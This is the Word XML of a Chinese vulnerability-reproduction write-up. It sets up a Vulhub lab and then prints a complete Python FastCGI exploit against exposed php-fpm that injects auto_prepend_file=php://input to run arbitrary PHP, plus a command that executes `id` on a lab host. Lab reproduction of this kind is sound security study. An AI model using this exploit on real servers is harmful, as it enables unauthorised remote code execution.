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AE4" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF1512">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRDefault="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、V</w:t>
      </w:r>
      <w:r>
        <w:t>ulhub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRDefault="00EF1512">
      <w:r>
        <w:rPr>
          <w:noProof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20320" b="1778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1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
                            <w:r>
                              <w:t>docker-compose build</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
                            <w:r>
                              <w:t>docker-compose up -d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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
                      <w:r>
                        <w:t>docker-compose build</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
                      <w:r>
                        <w:t>docker-compose up -d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F1512" w:rsidRDefault="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF1512">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRDefault="00EF1512">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、编写e</w:t>
      </w:r>
      <w:r>
        <w:t>xp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本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>import socket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>import random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>import argparse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>import sys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>from io import BytesIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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># Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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>PY2 = True if sys.version_info.major == 2 else False</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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>def bchr(i):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if PY2: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return force_bytes(chr(i))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else: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return bytes([i])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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>def bord(c):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if isinstance(c, int):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return c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else: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return ord(c)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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>def force_bytes(s):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if isinstance(s, bytes):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return s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else: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return s.encode('utf-8', 'strict')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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>def force_text(s):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if issubclass(type(s), str):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return s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if isinstance(s, bytes):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s = str(s, 'utf-8', 'strict')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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    else: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s = str(s)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return s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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>class FastCGIClient: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"""A Fast-CGI Client for Python"""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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# private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__FCGI_VERSION = 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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__FCGI_ROLE_RESPONDER = 1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__FCGI_ROLE_AUTHORIZER = 2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__FCGI_ROLE_FILTER = 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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__FCGI_TYPE_BEGIN = 1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__FCGI_TYPE_ABORT = 2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__FCGI_TYPE_END = 3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__FCGI_TYPE_PARAMS = 4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__FCGI_TYPE_STDIN = 5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__FCGI_TYPE_STDOUT = 6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__FCGI_TYPE_STDERR = 7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__FCGI_TYPE_DATA = 8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__FCGI_TYPE_GETVALUES = 9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__FCGI_TYPE_GETVALUES_RESULT = 10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__FCGI_TYPE_UNKOWNTYPE = 11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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__FCGI_HEADER_SIZE = 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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# request state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FCGI_STATE_SEND = 1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FCGI_STATE_ERROR = 2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FCGI_STATE_SUCCESS = 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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def __init__(self, host, port, timeout, keepalive):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self.host = host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self.port = port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self.timeout = timeout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if keepalive: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    self.keepalive = 1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else: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    self.keepalive = 0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self.sock = None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self.requests = dict()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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def __connect(self):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self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)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self.sock.settimeout(self.timeout)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self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)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# if self.keepalive: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#     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1)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# else: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#     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0)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try: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    self.sock.connect((self.host, int(self.port)))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except socket.error as msg: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    self.sock.close()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    self.sock = None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    print(repr(msg))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    return False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return True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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def __encodeFastCGIRecord(self, fcgi_type, content, requestid):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length = len(content)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buf = bchr(FastCGIClient.__FCGI_VERSION) \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       + bchr(fcgi_type) \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       + bchr((requestid &gt;&gt; 8) &amp; 0xFF) \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       + bchr(requestid &amp; 0xFF) \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       + bchr((length &gt;&gt; 8) &amp; 0xFF) \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       + bchr(length &amp; 0xFF) \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       + bchr(0) \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       + bchr(0) \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       + content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return buf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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def __encodeNameValueParams(self, name, value):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nLen = len(name)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vLen = len(value)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record = b''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if nLen &lt; 128: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    record += bchr(nLen)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else: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    record += bchr((nLen &gt;&gt; 24) | 0x80) \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              + bchr((nLen &gt;&gt; 16) &amp; 0xFF) \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              + bchr((nLen &gt;&gt; 8) &amp; 0xFF) \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              + bchr(nLen &amp; 0xFF)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if vLen &lt; 128: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    record += bchr(vLen)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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        else: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    record += bchr((vLen &gt;&gt; 24) | 0x80) \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              + bchr((vLen &gt;&gt; 16) &amp; 0xFF) \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              + bchr((vLen &gt;&gt; 8) &amp; 0xFF) \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              + bchr(vLen &amp; 0xFF)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return record + name + value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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def __decodeFastCGIHeader(self, stream):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header = dict()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header['version'] = bord(stream[0])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header['type'] = bord(stream[1])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header['requestId'] = (bord(stream[2]) &lt;&lt; 8) + bord(stream[3])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header['contentLength'] = (bord(stream[4]) &lt;&lt; 8) + bord(stream[5])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header['paddingLength'] = bord(stream[6])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header['reserved'] = bord(stream[7])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return header</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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def __decodeFastCGIRecord(self, buffer):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header = buffer.read(int(self.__FCGI_HEADER_SIZE))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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if not header: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    return False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else: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    record = self.__decodeFastCGIHeader(header)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    record['content'] = b''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    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    if 'contentLength' in record.keys():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        contentLength = int(record['contentLength'])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        record['content'] += buffer.read(contentLength)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    if 'paddingLength' in record.keys():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        skiped = buffer.read(int(record['paddingLength']))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    return record</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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def request(self, nameValuePairs={}, post=''):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if not self.__connect():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    print('connect failure! please check your fasctcgi-server !!')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    return</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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requestId = random.randint(1, (1 &lt;&lt; 16) - 1)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self.requests[requestId] = dict()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request = b""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beginFCGIRecordContent = bchr(0) \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                         + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \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                         + bchr(self.keepalive) \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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                 + bchr(0) * 5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request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,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                                      beginFCGIRecordContent, requestId)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paramsRecord = b''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if nameValuePairs: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    for (name, value) in nameValuePairs.items():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        name = force_bytes(name)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        value = force_bytes(value)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        paramsRecord += self.__encodeNameValueParams(name, value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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if paramsRecord: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    request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)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request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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if post: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    request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)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request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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self.sock.send(request)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self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SEND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self.requests[requestId]['response'] = b''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return self.__waitForResponse(requestId)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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def __waitForResponse(self, requestId):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data = b''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while True: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    buf = self.sock.recv(512)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    if not len(buf):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        break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    data += buf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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data = BytesIO(data)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while True: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    response = self.__decodeFastCGIRecord(data)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    if not response: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        break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    if response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \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            or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR: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        if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR: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            self.requests['state'] = FastCGIClient.FCGI_STATE_ERROR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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                if requestId == int(response['requestId']):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            self.requests[requestId]['response'] += response['content']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    if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS: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        self.requests[requestId]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return self.requests[requestId]['response']</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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def __repr__(self):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return "fastcgi connect host:{} port:{}".format(self.host, self.port)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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>if __name__ == '__main__':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parser = argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.')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parser.add_argument('host', help='Target host, such as 127.0.0.1')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parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php')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parser.add_argument('-c', '--code', help='What php code your want to execute', default='&lt;?php phpinfo(); exit; ?&gt;')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parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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args = parser.parse_args()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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client = FastCGIClient(args.host, args.port, 3, 0)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params = dict()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documentRoot = "/"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uri = args.file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content = args.code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params = {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'GATEWAY_INTERFACE': 'FastCGI/1.0',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'REQUEST_METHOD': 'POST',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'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),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'SCRIPT_NAME': uri,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'QUERY_STRING': '',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'REQUEST_URI': uri,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'DOCUMENT_ROOT': documentRoot,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'SERVER_SOFTWARE': 'php/fcgiclient',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'REMOTE_ADDR': '127.0.0.1',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'REMOTE_PORT': '9985',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'SERVER_ADDR': '127.0.0.1',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'SERVER_PORT': '80',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'SERVER_NAME': "localhost",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'SERVER_PROTOCOL': 'HTTP/1.1',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'CONTENT_TYPE': 'application/text',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'CONTENT_LENGTH': "%d" % len(content),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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        'PHP_VALUE': 'auto_prepend_file = php://input',</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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    'PHP_ADMIN_VALUE': 'allow_url_include = On'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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF1512">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">    response = client.request(params, content)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRPr="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF1512">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>print(force_text(response))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRDefault="00EF1512" w:rsidP="00EF1512">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRDefault="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、使用e</w:t>
      </w:r>
      <w:r>
        <w:t>xp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本，成功执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRDefault="00EF1512">
      <w:r w:rsidRPr="00EF1512">
        <w:t>python poc.py 192.168.239.129 /usr/local/lib/php/PEAR.php -c '&lt;?php echo `id`; ?&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF1512" w:rsidRDefault="00EF1512">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E46719A" wp14:editId="42AF25D7">
            <wp:extent cx="5274310" cy="15367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148" w:rsidRDefault="00997148" w:rsidP="00EF1512">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00997148" w:rsidRDefault="00997148" w:rsidP="00EF1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148" w:rsidRDefault="00997148" w:rsidP="00EF1512">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00997148" w:rsidRDefault="00997148" w:rsidP="00EF15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41C"/>
    <w:rsid w:val="008B5AE4"/>
    <w:rsid w:val="00997148"/>
    <w:rsid w:val="00EF1512"/>
    <w:rsid w:val="00FA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D5FFC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D1EA06B4-37B4-4625-91C6-68B4BE1B1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15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15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15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15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1300</Words>
  <Characters>7412</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>61</Lines>
  <Paragraphs>17</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-29T08:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-29T09:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>